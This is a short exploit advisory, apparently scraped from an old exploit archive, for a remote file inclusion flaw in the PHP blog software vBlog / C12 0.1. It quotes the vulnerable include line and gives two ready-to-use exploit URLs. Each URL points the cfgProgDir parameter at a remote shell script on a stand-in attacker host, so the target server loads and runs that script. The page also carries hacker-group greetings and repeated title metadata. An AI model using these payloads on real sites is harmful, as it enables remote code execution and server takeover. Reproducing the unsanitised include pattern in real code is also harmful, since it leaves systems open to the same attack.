vBlog / C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities

2006-11-0800:00:00

vulners.com

                                          WwW.Deltahacking.NeT &#40;Priv8  Site&#41;
                                          WwW.Deltahacking.Ir    &#40;Public Site&#41;

Portal Name :Vortex Blog AKA vBlog
Class = Remote File Inclusion ;
Download =http://switch.dl.sourceforge.net/sourceforge/c12/C12_a0.1_nonfunc.zip
Found by = Dr.Pantagon ([email protected])

Vulnerable Code

include($cfgProgDir . "session.php");

++++++++++++++++++++++++++++++++++++++++++++

Exploit:

http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell?
http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?

Special Thanks : Dr.Trojan , Hiv++ , D_7j , Lord
Special Thanks To Best My Friend : Tanha

milw0rm.com [2006-11-08]

JSON

vBlog / C12 0.1 &#40;cfgProgDir&#41; Remote File Include Vulnerabilities

milw0rm.com [2006-11-08]

vBlog / C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities